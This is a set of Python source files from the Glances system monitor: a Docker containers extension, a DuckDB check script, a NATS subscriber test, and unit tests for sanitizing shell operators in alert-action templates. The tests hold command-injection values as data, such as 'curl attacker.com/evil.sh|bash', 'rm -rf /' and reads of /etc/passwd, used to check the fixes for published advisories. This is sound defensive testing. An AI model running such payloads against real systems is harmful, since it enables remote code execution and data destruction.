#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Docker Extension unit for Glances' Containers plugin."""

import time
from concurrent.futures import ThreadPoolExecutor
from typing import Any

from glances.globals import nativestr, pretty_date, replace_special_chars
from glances.logger import logger
from glances.stats_streamer import ThreadedIterableStreamer

# Docker-py library (optional and Linux-only)
# https://github.com/docker/docker-py
try:
    import docker
    import requests
    from dateutil import parser, tz
except Exception as e:
    disable_plugin_docker = True
    # Display debug message if import KeyError
    logger.warning(f"Error loading Docker deps Lib. Docker plugin is disabled ({e})")
else:
    disable_plugin_docker = False


# Issue #3559: number of containers inspected concurrently per update cycle.
# docker-py's default list() inspects each container sequentially (one synchronous
# API call per container). Kept under docker-py's default connection pool size to
# avoid "connection pool is full" warnings.
MAX_CONCURRENT_INSPECT = 6


class DockerStatsFetcher:
    MANDATORY_MEMORY_FIELDS = ['usage', 'limit']

    def __init__(self, container):
        self._container = container

        # Previous computes stats are stored in the self._old_computed_stats variable
        # We store time data to enable IoR/s & IoW/s calculations to avoid complexity for consumers of the APIs exposed.
        self._old_computed_stats = {}

        # Last time when output stats (results) were computed
        self._last_stats_computed_time = 0

        # Threaded Streamer
        stats_iterable = container.stats(decode=True)
        self._streamer = ThreadedIterableStreamer(stats_iterable, initial_stream_value={})

    def _log_debug(self, msg, exception=None):
        logger.debug(f"containers (Docker) ID: {self._container.id} - {msg} ({exception}) ")
        logger.debug(self._streamer.stats)

    def stop(self):
        self._streamer.stop()

    @property
    def activity_stats(self) -> dict[str, dict[str, Any]]:
        """Activity Stats

        Each successive access of activity_stats will cause computation of activity_stats
        """
        computed_activity_stats = self._compute_activity_stats()
        self._old_computed_stats = computed_activity_stats
        self._last_stats_computed_time = time.time()
        return computed_activity_stats

    def _compute_activity_stats(self) -> dict[str, dict[str, Any]]:
        with self._streamer.result_lock:
            io_stats = self._get_io_stats()
            cpu_stats = self._get_cpu_stats()
            memory_stats = self._get_memory_stats()
            network_stats = self._get_network_stats()

        return {
            "io": io_stats or {},
            "memory": memory_stats or {},
            "network": network_stats or {},
            "cpu": cpu_stats or {"total": 0.0},
        }

    @property
    def time_since_update(self) -> float:
        # In case no update, default to 1
        return max(1, self._streamer.last_update_time - self._last_stats_computed_time)

    def _get_cpu_stats(self) -> dict[str, float] | None:
        """Return the container CPU usage.

        Output: a dict {'total': 1.49, 'limit': 2.0}
        """
        stats = {'total': 0.0, 'limit': 0.0}

        try:
            cpu_stats = self._streamer.stats['cpu_stats']
            precpu_stats = self._streamer.stats['precpu_stats']
            cpu = {'system': cpu_stats['system_cpu_usage'], 'total': cpu_stats['cpu_usage']['total_usage']}
            precpu = {'system': precpu_stats['system_cpu_usage'], 'total': precpu_stats['cpu_usage']['total_usage']}

            # Issue #1857
            # If either precpu_stats.online_cpus or cpu_stats.online_cpus is nil
            # then for compatibility with older daemons the length of
            # the corresponding cpu_usage.percpu_usage array should be used.
            cpu['nb_core'] = cpu_stats.get('online_cpus') or len(cpu_stats['cpu_usage']['percpu_usage'] or [])
        except KeyError as e:
            self._log_debug("Can't grab CPU stats", e)
            return None

        try:
            cpu_delta = cpu['total'] - precpu['total']
            system_cpu_delta = cpu['system'] - precpu['system']
            # CPU usage % = (cpu_delta / system_cpu_delta) * number_cpus * 100.0
            stats['total'] = (cpu_delta / system_cpu_delta) * cpu['nb_core'] * 100.0
        except TypeError as e:
            self._log_debug("Can't compute CPU usage", e)
            return None

        host_config = self._container.attrs.get('HostConfig', {})
        nano_cpus = host_config.get('NanoCpus', 0)
        if nano_cpus > 0:
            stats['limit'] = nano_cpus / 1e9
        else:
            cpu_quota = host_config.get('CpuQuota', 0)
            cpu_period = host_config.get('CpuPeriod', 100_000)
            if cpu_quota > 0 and cpu_period > 0:
                stats['limit'] = cpu_quota / cpu_period
            else:
                stats['limit'] = float(cpu.get('nb_core', 0))

        # Return the stats
        return stats

    def _get_memory_stats(self) -> dict[str, float] | None:
        """Return the container MEMORY.

        Output: a dict {'usage': ..., 'limit': ..., 'inactive_file': ...}

        Note:the displayed memory usage is 'usage - inactive_file'
        """
        memory_stats = self._streamer.stats.get('memory_stats')

        # Checks for memory_stats & mandatory fields
        if not memory_stats or any(field not in memory_stats for field in self.MANDATORY_MEMORY_FIELDS):
            self._log_debug("Missing MEM usage fields")
            return None

        stats = {field: memory_stats[field] for field in self.MANDATORY_MEMORY_FIELDS}

        # Optional field stats: inactive_file
        if memory_stats.get('stats', {}).get('inactive_file') is not None:
            stats['inactive_file'] = memory_stats['stats']['inactive_file']

        # Return the stats
        return stats

    def _get_network_stats(self) -> dict[str, float] | None:
        """Return the container network usage using the Docker API (v1.0 or higher).

        Output: a dict {'time_since_update': 3000, 'rx': 10, 'tx': 65}.
        with:
            time_since_update: number of seconds elapsed between the latest grab
            rx: Number of bytes received
            tx: Number of bytes transmitted
        """
        eth0_stats = self._streamer.stats.get('networks', {}).get('eth0')

        # Checks for net_stats & mandatory fields
        if not eth0_stats or any(field not in eth0_stats for field in ['rx_bytes', 'tx_bytes']):
            self._log_debug("Missing Network usage fields")
            return None

        # Read the rx/tx stats (in bytes)
        stats = {'cumulative_rx': eth0_stats["rx_bytes"], 'cumulative_tx': eth0_stats["tx_bytes"]}

        # Using previous stats to calculate rates
        old_network_stats = self._old_computed_stats.get("network")
        if old_network_stats:
            stats['time_since_update'] = round(self.time_since_update)
            stats['rx'] = stats['cumulative_rx'] - old_network_stats["cumulative_rx"]
            stats['tx'] = stats['cumulative_tx'] - old_network_stats['cumulative_tx']

        # Return the stats
        return stats

    def _get_io_stats(self) -> dict[str, float] | None:
        """Return the container IO usage using the Docker API (v1.0 or higher).

        Output: a dict {'time_since_update': 3000, 'ior': 10, 'iow': 65}.
        with:
            time_since_update: number of seconds elapsed between the latest grab
            ior: Number of bytes read
            iow: Number of bytes written
        """
        io_service_bytes_recursive = self._streamer.stats.get('blkio_stats', {}).get('io_service_bytes_recursive')

        # Checks for net_stats
        if not io_service_bytes_recursive:
            self._log_debug("Missing blockIO usage fields")
            return None

        # Read the ior/iow stats (in bytes)
        try:
            # Read IOR and IOW value in the structure list of dict
            cumulative_ior = [i for i in io_service_bytes_recursive if i['op'].lower() == 'read'][0]['value']
            cumulative_iow = [i for i in io_service_bytes_recursive if i['op'].lower() == 'write'][0]['value']
        except (TypeError, IndexError, KeyError, AttributeError) as e:
            self._log_debug("Can't grab blockIO usage", e)  # stats do not have io information
            return None

        stats = {'cumulative_ior': cumulative_ior, 'cumulative_iow': cumulative_iow}

        # Using previous stats to calculate difference
        old_io_stats = self._old_computed_stats.get("io")
        if old_io_stats:
            stats['time_since_update'] = round(self.time_since_update)
            stats['ior'] = stats['cumulative_ior'] - old_io_stats["cumulative_ior"]
            stats['iow'] = stats['cumulative_iow'] - old_io_stats["cumulative_iow"]

        # Return the stats
        return stats


class DockerExtension:
    """Glances' Containers Plugin's Docker Extension unit"""

    CONTAINER_ACTIVE_STATUS = ['running', 'healthy', 'paused']

    def __init__(self):
        self.disable = disable_plugin_docker
        if self.disable:
            raise Exception("Missing libs required to run Docker Extension (Containers) ")

        self.display_error = True

        self.client = None
        self.ext_name = "containers (Docker)"
        self.stats_fetchers = {}

        # Issue #3559: cache the (immutable) image tags per container id to avoid
        # one inspect_image API call per container on every refresh.
        self.image_cache = {}

        self.connect()

    def connect(self) -> None:
        """Connect to the Docker server."""
        # Init the Docker API Client
        try:
            # Do not use the timeout option (see issue #1878)
            self.client = docker.from_env()
        except Exception as e:
            logger.error(f"{self.ext_name} plugin - Can't connect to Docker ({e})")
            self.client = None

    def update_version(self):
        # Long and not useful anymore because the information is no more displayed in UIs
        # return self.client.version()
        return {}

    def stop(self) -> None:
        # Stop all streaming threads
        for t in self.stats_fetchers.values():
            t.stop()

    def update(self, all_tag) -> tuple[dict, list[dict]]:
        """Update Docker stats using the input method."""

        if not self.client or self.disable:
            return {}, []

        version_stats = self.update_version()

        # Update current containers list
        try:
            # Issue #1152: Docker module doesn't export details about stopped containers
            # The Containers/all key of the configuration file should be set to True
            # Issue #3559: docker-py's list() inspects each container sequentially (one
            # synchronous API call per container), which dominates the update time when
            # there are many containers. Use sparse=True to get the list in a single API
            # call, then inspect the containers concurrently (see _inspect_concurrently).
            containers = self.client.containers.list(all=all_tag, sparse=True)
            self.display_error = True
        except Exception as e:
            if self.display_error:
                logger.error(f"{self.ext_name} plugin - Can't get containers list ({e})")
                self.display_error = False
            else:
                logger.debug(f"{self.ext_name} plugin - Can't get containers list ({e})")
            return version_stats, []

        # Inspect the containers concurrently to populate their attributes (issue #3559)
        containers = self._inspect_concurrently(containers)

        # Start new thread for new container
        for container in containers:
            if container.id not in self.stats_fetchers:
                # StatsFetcher did not exist in the internal dict
                # Create it, add it to the internal dict
                logger.debug(f"{self.ext_name} plugin - Create thread for container {container.id[:12]}")
                self.stats_fetchers[container.id] = DockerStatsFetcher(container)

        # Stop threads for non-existing containers
        current_ids = {c.id for c in containers}
        absent_containers = set(self.stats_fetchers.keys()) - current_ids
        for container_id in absent_containers:
            # Stop the StatsFetcher
            logger.debug(f"{self.ext_name} plugin - Stop thread for old container {container_id[:12]}")
            self.stats_fetchers[container_id].stop()
            # Delete the StatsFetcher from the dict
            del self.stats_fetchers[container_id]

        # Drop image cache entries for non-existing containers (issue #3559)
        for container_id in set(self.image_cache) - current_ids:
            del self.image_cache[container_id]

        # Get stats for all containers
        container_stats = [self.generate_stats(container) for container in containers]
        return version_stats, container_stats

    def _inspect_concurrently(self, containers: list) -> list:
        """Inspect the given (sparse) containers concurrently and return the live ones.

        docker-py's `list()` inspects containers one at a time, i.e. O(N) synchronous
        API calls on the caller thread (issue #3559). `list(sparse=True)` returns
        summary-only objects in a single call; `reload()` performs the per-container
        inspect, which we parallelise here to keep the update time roughly independent
        of the number of containers. Containers removed between the list and the inspect
        are dropped.
        """
        if not containers:
            return []

        def reload_container(container):
            try:
                container.reload()
                return container
            except Exception as e:
                # Container removed between list and inspect, or inspect failed
                logger.debug(f"{self.ext_name} plugin - Can't inspect container {container.id[:12]} ({e})")
                return None

        max_workers = min(len(containers), MAX_CONCURRENT_INSPECT)
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            reloaded = executor.map(reload_container, containers)

        return [container for container in reloaded if container is not None]

    @property
    def key(self) -> str:
        """Return the key of the list."""
        return 'name'

    def _get_image(self, container):
        """Return the container image tags, cached per container id (issue #3559).

        `container.image` performs an inspect_image API call. The image of a container
        is immutable for its lifetime, so the result is cached to avoid one synchronous
        API call per container on every refresh.
        """
        if container.id in self.image_cache:
            return self.image_cache[container.id]

        try:
            # API fails on Unraid - See issue #2233
            # Access container.image only once (it triggers an inspect_image API call)
            tags = container.image.tags
            image = (','.join(tags if tags else []),)
        except (requests.exceptions.HTTPError, docker.errors.NullResource):
            # Container plugin crashes with docker.errors.NullResource on Podman pod infra containers issue #3498
            image = ''

        self.image_cache[container.id] = image
        return image

    def generate_stats(self, container) -> dict[str, Any]:
        # Init the stats for the current container
        # Manage healthy status (see issue #3402)
        status = container.attrs['State'].get('Health', container.attrs['State']).get('Status', '')
        stats = {
            'key': self.key,
            'name': nativestr(container.name),
            'id': container.id,
            'status': status,
            'created': container.attrs['Created'],
            'command': [],
            'io': {},
            'cpu': {},
            'memory': {},
            'network': {},
            'io_rx': None,
            'io_wx': None,
            'cpu_percent': None,
            'memory_percent': None,
            'network_rx': None,
            'network_tx': None,
            'ports': '',
            'uptime': None,
        }

        # Container Image
        stats['image'] = self._get_image(container)

        if container.attrs['Config'].get('Entrypoint', None):
            stats['command'].extend(container.attrs['Config'].get('Entrypoint', []))
        if container.attrs['Config'].get('Cmd', None):
            stats['command'].extend(container.attrs['Config'].get('Cmd', []))
        if not stats['command']:
            stats['command'] = None

        if stats['status'] not in self.CONTAINER_ACTIVE_STATUS:
            return stats

        stats_fetcher = self.stats_fetchers[container.id]
        activity_stats = stats_fetcher.activity_stats
        stats.update(activity_stats)

        # Additional fields
        stats['cpu_percent'] = stats['cpu']['total']
        stats['cpu_limit'] = stats['cpu'].get('limit')
        stats['memory_usage'] = stats['memory'].get('usage')
        if stats['memory'].get('cache') is not None:
            stats['memory_usage'] -= stats['memory']['cache']
        stats['memory_inactive_file'] = stats['memory'].get('inactive_file')
        stats['memory_limit'] = stats['memory'].get('limit')

        if all(k in stats['io'] for k in ('ior', 'iow', 'time_since_update')):
            stats['io_rx'] = stats['io']['ior'] // stats['io']['time_since_update']
            stats['io_wx'] = stats['io']['iow'] // stats['io']['time_since_update']

        if all(k in stats['network'] for k in ('rx', 'tx', 'time_since_update')):
            stats['network_rx'] = stats['network']['rx'] // stats['network']['time_since_update']
            stats['network_tx'] = stats['network']['tx'] // stats['network']['time_since_update']

        started_at = container.attrs['State']['StartedAt']
        stats['uptime'] = pretty_date(parser.parse(started_at).astimezone(tz.tzlocal()).replace(tzinfo=None))

        # Manage special chars in command (see issue#2733)
        stats['command'] = replace_special_chars(' '.join(stats['command']))

        # Manage ports (see issue#2054)
        if hasattr(container, 'ports'):
            stats['ports'] = ','.join(
                [
                    f'{container.ports[cp][0]["HostPort"]}->{cp}' if container.ports[cp] else f'{cp}'
                    for cp in container.ports
                ]
            )

        return stats



#!/usr/bin/env python
#
# Check a DuckDB file.
# The input DuckDB file should be given as an input with the -i <file> option.
# Check the following thinks:
# - number of line (without the header) should be equal to the number given with the -l <number of lines> option
# - each line should have the same number of columns
# - if the optional -c <number of columns> option is given, each line should have the the same number of columns

import argparse
import sys

import duckdb


def check_duckdb(input_file, expected_lines, expected_columns=None):
    try:
        db = duckdb.connect(database='/tmp/glances.db', read_only=True)

        result = db.sql("SELECT * from cpu").fetchall()

        # Check 1: Number of lines for CPU
        row_count = len(result)
        if row_count < expected_lines:
            print(f"Error: Expected {expected_lines} CPU lines, but found {row_count}")
            return False

        result = db.sql("SELECT * from network").fetchall()

        # Check 2: Number of lines for Network
        row_count = len(result)
        if row_count < expected_lines:
            print(f"Error: Expected {expected_lines} Network lines, but found {row_count}")
            return False

        return True

    except FileNotFoundError:
        print(f"Error: File '{input_file}' not found")
        return False
    except Exception as e:
        print(f"Error processing DuckDB file: {str(e)}")
        return False


def main():
    parser = argparse.ArgumentParser(description='Check a DuckDB file for various properties.')
    parser.add_argument('-i', '--input', required=True, help='Input CSV file')
    parser.add_argument('-l', '--lines', type=int, required=True, help='Expected number of lines (excluding header)')
    parser.add_argument('-c', '--columns', type=int, help='Expected number of columns (optional)')

    args = parser.parse_args()

    success = check_duckdb(args.input, args.lines, args.columns)

    if success:
        print("DuckDB - All checks passed successfully!")
        sys.exit(0)
    else:
        print("DuckDB validation failed.")
        sys.exit(1)


if __name__ == "__main__":
    main()



import asyncio

import nats


async def main():
    duration = 30
    subject = "glances.*"

    nc = nats.NATS()

    await nc.connect(servers=["nats://localhost:4222"])

    future = asyncio.Future()

    async def cb(msg):
        subject = msg.subject
        reply = msg.reply
        data = msg.data.decode()
        print(f"Received a message on '{subject} {reply}': {data}")

    print(f"Receiving message from {subject} during {duration} seconds...")
    await nc.subscribe(subject, cb=cb)
    await asyncio.wait_for(future, duration)

    await nc.close()


if __name__ == '__main__':
    asyncio.run(main())

# To run this test script, make sure you have a NATS server running locally.



#!/usr/bin/env python
#
# Glances - An eye on your system
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Glances unit tests for action command sanitization.

Tests cover:
- _sanitize_mustache_dict strips shell operators from string values
- Pipe (|), chain (&&), redirect (>, >>) injection via Mustache values
- Non-string values are preserved unchanged
- The sanitization integrates correctly with GlancesActions.run()
- secure_popen basic functionality
"""

import os
import tempfile
from unittest.mock import patch

import pytest

from glances.actions import GlancesActions, _sanitize_mustache_dict, _sanitize_value
from glances.secure import secure_popen

# Skip the whole module on Windows where echo -n behaves differently
pytestmark = pytest.mark.skipif(
    os.name == 'nt',
    reason='Shell command tests are POSIX-only',
)


# ---------------------------------------------------------------------------
# Tests – _sanitize_mustache_dict
# ---------------------------------------------------------------------------


class TestSanitizeMustacheDict:
    """Unit tests for _sanitize_mustache_dict."""

    def test_none_returns_none(self):
        assert _sanitize_mustache_dict(None) is None

    def test_empty_dict_returns_empty(self):
        assert _sanitize_mustache_dict({}) == {}

    def test_strips_pipe(self):
        d = {'name': 'innocent|curl evil.com'}
        safe = _sanitize_mustache_dict(d)
        assert '|' not in safe['name']
        assert safe['name'] == 'innocent curl evil.com'

    def test_strips_double_ampersand(self):
        d = {'name': 'web && curl evil.com'}
        safe = _sanitize_mustache_dict(d)
        assert '&&' not in safe['name']
        assert safe['name'] == 'web   curl evil.com'

    def test_strips_redirect(self):
        d = {'name': 'data > /etc/passwd'}
        safe = _sanitize_mustache_dict(d)
        assert '>' not in safe['name']
        assert safe['name'] == 'data   /etc/passwd'

    def test_strips_append_redirect(self):
        d = {'name': 'data >> /etc/shadow'}
        safe = _sanitize_mustache_dict(d)
        assert '>>' not in safe['name']
        assert safe['name'] == 'data   /etc/shadow'

    def test_strips_multiple_operators(self):
        d = {'name': 'foo|bar && baz > qux >> end'}
        safe = _sanitize_mustache_dict(d)
        assert '|' not in safe['name']
        assert '&&' not in safe['name']
        # >> is replaced first (before >), then remaining > is replaced
        for op in ('|', '&&', '>>', '>'):
            assert op not in safe['name']

    def test_preserves_int_values(self):
        d = {'cpu_percent': 95, 'name': 'safe'}
        safe = _sanitize_mustache_dict(d)
        assert safe['cpu_percent'] == 95

    def test_preserves_float_values(self):
        d = {'load': 3.14, 'name': 'safe'}
        safe = _sanitize_mustache_dict(d)
        assert safe['load'] == 3.14

    def test_preserves_none_values(self):
        d = {'key': None, 'name': 'safe'}
        safe = _sanitize_mustache_dict(d)
        assert safe['key'] is None

    def test_preserves_bool_values(self):
        d = {'is_up': True, 'name': 'safe'}
        safe = _sanitize_mustache_dict(d)
        assert safe['is_up'] is True

    def test_preserves_list_of_numbers(self):
        # Numeric list elements are not strings: left unchanged.
        d = {'ports': [80, 443], 'name': 'safe'}
        safe = _sanitize_mustache_dict(d)
        assert safe['ports'] == [80, 443]

    def test_strips_operators_in_nested_list(self):
        # GHSA-73wf-9vmv-5pv9: process cmdline is a list of attacker argv.
        d = {'cmdline': ['x', '|touch /tmp/evil', '#']}
        safe = _sanitize_mustache_dict(d)
        assert '|' not in ''.join(safe['cmdline'])
        assert safe['cmdline'] == ['x', ' touch /tmp/evil', '#']

    def test_strips_operators_in_nested_dict(self):
        d = {'meta': {'k': 'a|b && c > d'}}
        safe = _sanitize_mustache_dict(d)
        for op in ('|', '&&', '>'):
            assert op not in safe['meta']['k']

    def test_strips_operators_in_deeply_nested(self):
        d = {'outer': {'inner': ['ok', 'evil|rm -rf /']}}
        safe = _sanitize_mustache_dict(d)
        assert '|' not in safe['outer']['inner'][1]

    def test_preserves_tuple_type(self):
        d = {'args': ('a', 'b|c')}
        safe = _sanitize_mustache_dict(d)
        assert isinstance(safe['args'], tuple)
        assert '|' not in safe['args'][1]

    def test_sanitize_value_passthrough_non_string(self):
        assert _sanitize_value(95) == 95
        assert _sanitize_value(3.14) == 3.14
        assert _sanitize_value(True) is True
        assert _sanitize_value(None) is None

    def test_clean_string_unchanged(self):
        d = {'name': 'my-web-server', 'mnt_point': '/data/disk1'}
        safe = _sanitize_mustache_dict(d)
        assert safe['name'] == 'my-web-server'
        assert safe['mnt_point'] == '/data/disk1'

    def test_does_not_mutate_original(self):
        d = {'name': 'foo|bar'}
        _sanitize_mustache_dict(d)
        assert d['name'] == 'foo|bar'

    def test_returns_new_dict(self):
        d = {'name': 'foo'}
        safe = _sanitize_mustache_dict(d)
        assert safe is not d


# ---------------------------------------------------------------------------
# Tests – Command injection scenarios
# ---------------------------------------------------------------------------


class TestCommandInjectionPrevention:
    """Verify that crafted Mustache values cannot inject commands."""

    def test_pipe_injection_in_process_name(self):
        """Simulate: process name contains pipe to inject curl command."""
        mustache_dict = {
            'name': 'innocent|curl attacker.com/evil.sh|bash',
            'cpu_percent': 99.0,
        }
        safe = _sanitize_mustache_dict(mustache_dict)
        # The pipe characters must be gone
        assert '|' not in safe['name']
        assert 'curl' in safe['name']  # text is preserved, just operator removed

    def test_chain_injection_in_container_name(self):
        """Simulate: container name contains && to chain commands."""
        mustache_dict = {
            'name': 'web && curl attacker.com/rev.sh | bash && echo ',
            'Image': 'nginx:latest',
            'Id': 'abc123',
            'cpu': 95.0,
        }
        safe = _sanitize_mustache_dict(mustache_dict)
        assert '&&' not in safe['name']
        assert '|' not in safe['name']
        # Non-string fields untouched
        assert safe['cpu'] == 95.0

    def test_redirect_injection_in_mount_point(self):
        """Simulate: mount point contains redirect to overwrite files."""
        mustache_dict = {
            'mnt_point': '/data > /etc/crontab',
            'used': 900000,
            'size': 1000000,
        }
        safe = _sanitize_mustache_dict(mustache_dict)
        assert '>' not in safe['mnt_point']

    def test_append_redirect_injection(self):
        """Simulate: value contains >> to append to sensitive files."""
        mustache_dict = {
            'name': 'logger >> /etc/shadow',
        }
        safe = _sanitize_mustache_dict(mustache_dict)
        assert '>>' not in safe['name']

    def test_lone_ampersand_is_stripped(self):
        """GHSA-qcpp-8x79-hhp3: a single '&' (not '&&') must also be neutralised,
        otherwise two adjacent unescaped variables can rejoin it into '&&'."""
        safe = _sanitize_mustache_dict({'name': 'evilproc&'})
        assert '&' not in safe['name']
        assert safe['name'] == 'evilproc '

    def test_cross_field_ampersand_reconstruction_blocked(self):
        """GHSA-qcpp-8x79-hhp3: a trailing '&' in one value and a leading '&' in
        the next must not reconstruct a real '&&' when rendered back to back."""
        d = {'a': 'evilproc&', 'b': '& touch /tmp/evil'}
        safe = _sanitize_mustache_dict(d)
        # Concatenation of two unescaped variables (chevron {{{a}}}{{{b}}}).
        rendered = safe['a'] + safe['b']
        assert '&&' not in rendered


# ---------------------------------------------------------------------------
# Tests – secure_popen basic functionality
# ---------------------------------------------------------------------------


class TestSecurePopen:
    """Basic tests for secure_popen."""

    def test_simple_echo(self):
        assert secure_popen('echo -n TEST') == 'TEST'

    def test_chained_commands(self):
        assert secure_popen('echo -n A && echo -n B') == 'AB'

    def test_pipe(self):
        result = secure_popen('echo FOO | grep FOO')
        assert 'FOO' in result

    def test_redirect_to_file(self):
        with tempfile.NamedTemporaryFile(mode='r', suffix='.txt', delete=False) as f:
            tmpfile = f.name
        try:
            secure_popen(f'echo -n HELLO > {tmpfile}')
            with open(tmpfile) as f:
                assert f.read() == 'HELLO'
        finally:
            os.unlink(tmpfile)


# ---------------------------------------------------------------------------
# Tests – GlancesActions.run() integration
# ---------------------------------------------------------------------------


class TestActionsRunIntegration:
    """Verify that GlancesActions.run() uses sanitized mustache values."""

    @pytest.fixture
    def actions(self):
        """Create a GlancesActions instance with an expired start timer."""
        a = GlancesActions()
        # Force the start timer to be finished so actions can run immediately
        a.start_timer = type('FakeTimer', (), {'finished': lambda self: True})()
        return a

    def test_run_with_safe_values(self, actions):
        """Normal run with safe values should succeed."""
        result = actions.run(
            'cpu',
            'CRITICAL',
            ['echo -n {{name}}'],
            repeat=False,
            mustache_dict={'name': 'myprocess'},
        )
        assert result is True

    def test_run_sanitizes_pipe_in_mustache(self, actions):
        """Pipe in mustache value must not create a real pipe."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'cpu',
                'CRITICAL',
                ['echo {{name}}'],
                repeat=False,
                mustache_dict={'name': 'evil|rm -rf /'},
            )
            # The command passed to secure_popen should have | replaced
            called_cmd = mock_popen.call_args[0][0]
            assert '|' not in called_cmd
            assert 'evil' in called_cmd
            assert 'rm -rf /' in called_cmd  # text preserved, pipe removed

    def test_run_sanitizes_chain_in_mustache(self, actions):
        """&& in mustache value must not chain commands."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'containers',
                'WARNING',
                ['echo {{name}}'],
                repeat=False,
                mustache_dict={'name': 'web && cat /etc/passwd'},
            )
            called_cmd = mock_popen.call_args[0][0]
            assert '&&' not in called_cmd

    def test_run_sanitizes_redirect_in_mustache(self, actions):
        """> in mustache value must not redirect output."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'fs',
                'CRITICAL',
                ['echo {{mnt_point}}'],
                repeat=False,
                mustache_dict={'mnt_point': '/data > /etc/crontab'},
            )
            called_cmd = mock_popen.call_args[0][0]
            assert '>' not in called_cmd

    def test_run_preserves_template_operators(self, actions):
        """Operators in the template itself (not in values) must be preserved."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            # The template has a pipe, but the mustache value is clean
            actions.run(
                'cpu',
                'CRITICAL',
                ['echo {{name}} | grep something'],
                repeat=False,
                mustache_dict={'name': 'safe-process'},
            )
            called_cmd = mock_popen.call_args[0][0]
            # Template pipe is preserved
            assert '|' in called_cmd
            assert 'grep something' in called_cmd

    def test_run_preserves_template_redirect(self, actions):
        """Redirect in the template itself must be preserved."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'fs',
                'WARNING',
                ['echo {{mnt_point}} > /tmp/alert.log'],
                repeat=False,
                mustache_dict={'mnt_point': '/data/disk1'},
            )
            called_cmd = mock_popen.call_args[0][0]
            assert '>' in called_cmd
            assert '/tmp/alert.log' in called_cmd

    def test_run_preserves_template_chain(self, actions):
        """&& in the template itself must be preserved."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'cpu',
                'CRITICAL',
                ['echo {{name}} && echo done'],
                repeat=False,
                mustache_dict={'name': 'safe-process'},
            )
            called_cmd = mock_popen.call_args[0][0]
            assert '&&' in called_cmd

    def test_run_sanitizes_cmdline_section(self, actions):
        """GHSA-73wf-9vmv-5pv9: a pipe in the process cmdline list (rendered via
        a Mustache section) must not survive into secure_popen."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'processlist',
                'CRITICAL',
                ['echo ALERT {{#cmdline}}{{.}} {{/cmdline}}'],
                repeat=False,
                mustache_dict={'cmdline': ['x', '|touch /tmp/evil', '#']},
            )
            called_cmd = mock_popen.call_args[0][0]
            assert '|' not in called_cmd
            assert 'touch /tmp/evil' in called_cmd  # text preserved, pipe removed

    def test_run_blocks_cross_field_ampersand_chain(self, actions):
        """GHSA-qcpp-8x79-hhp3: two adjacent unescaped variables whose values
        end/begin with '&' must not reconstruct a real '&&' command chain."""
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'processlist',
                'CRITICAL',
                ['logger p={{{name}}}{{{cmdline}}}'],
                repeat=False,
                mustache_dict={'name': 'evilproc&', 'cmdline': '& touch /tmp/evil'},
            )
            called_cmd = mock_popen.call_args[0][0]
            assert '&&' not in called_cmd

    def test_run_does_not_execute_when_already_triggered(self, actions):
        """Same criticality should not re-trigger if repeat=False."""
        actions.set('cpu', 'CRITICAL')
        result = actions.run(
            'cpu',
            'CRITICAL',
            ['echo test'],
            repeat=False,
            mustache_dict={},
        )
        assert result is False

    def test_run_repeats_when_repeat_true(self, actions):
        """Same criticality should re-trigger when repeat=True."""
        actions.set('cpu', 'CRITICAL')
        result = actions.run(
            'cpu',
            'CRITICAL',
            ['echo test'],
            repeat=True,
            mustache_dict={},
        )
        assert result is True


# ---------------------------------------------------------------------------
# Tests – --disable-config-exec on the on-alert action path
# ---------------------------------------------------------------------------


class _Args:
    """Minimal args stub carrying only disable_config_exec."""

    def __init__(self, disable_config_exec):
        self.disable_config_exec = disable_config_exec


class TestActionsDisableConfigExec:
    """GHSA-59fj-m2j6-hcxh: --disable-config-exec must also disable shell
    operators (&&, |, >) in config-defined on-alert action commands, not only
    in AMP commands.
    """

    def _make_actions(self, args):
        a = GlancesActions(args=args)
        # Force the start timer to be finished so actions can run immediately
        a.start_timer = type('FakeTimer', (), {'finished': lambda self: True})()
        return a

    def test_allow_operators_true_when_no_args(self):
        assert GlancesActions().allow_operators() is True

    def test_allow_operators_true_when_flag_absent(self):
        assert GlancesActions(args=object()).allow_operators() is True

    def test_allow_operators_false_when_disabled(self):
        assert GlancesActions(args=_Args(True)).allow_operators() is False

    def test_allow_operators_true_when_enabled(self):
        assert GlancesActions(args=_Args(False)).allow_operators() is True

    def test_run_passes_allow_operators_false_when_disabled(self):
        """With --disable-config-exec, secure_popen must be called with
        allow_operators=False so operators in the command are not interpreted."""
        actions = self._make_actions(_Args(True))
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'cpu',
                'CRITICAL',
                ['echo MARKER > /tmp/poc_marker'],
                repeat=False,
                mustache_dict={},
            )
            assert mock_popen.call_args.kwargs['allow_operators'] is False

    def test_run_passes_allow_operators_true_by_default(self):
        """Without the flag, the historical behavior (operators interpreted) is
        preserved for backward compatibility."""
        actions = self._make_actions(_Args(False))
        with patch('glances.actions.secure_popen') as mock_popen:
            mock_popen.return_value = ''
            actions.run(
                'cpu',
                'CRITICAL',
                ['echo MARKER > /tmp/poc_marker'],
                repeat=False,
                mustache_dict={},
            )
            assert mock_popen.call_args.kwargs['allow_operators'] is True

    def test_run_disabled_does_not_write_redirect_file(self):
        """End-to-end: the '>' redirect must not create a file when the flag is
        set (this is the concrete PoC from the advisory)."""
        with tempfile.NamedTemporaryFile(suffix='.txt', delete=False) as f:
            marker = f.name
        os.unlink(marker)  # remove so we can detect a spurious re-creation
        try:
            actions = self._make_actions(_Args(True))
            actions.run(
                'cpu',
                'CRITICAL',
                [f'echo -n MARKER > {marker}'],
                repeat=False,
                mustache_dict={},
            )
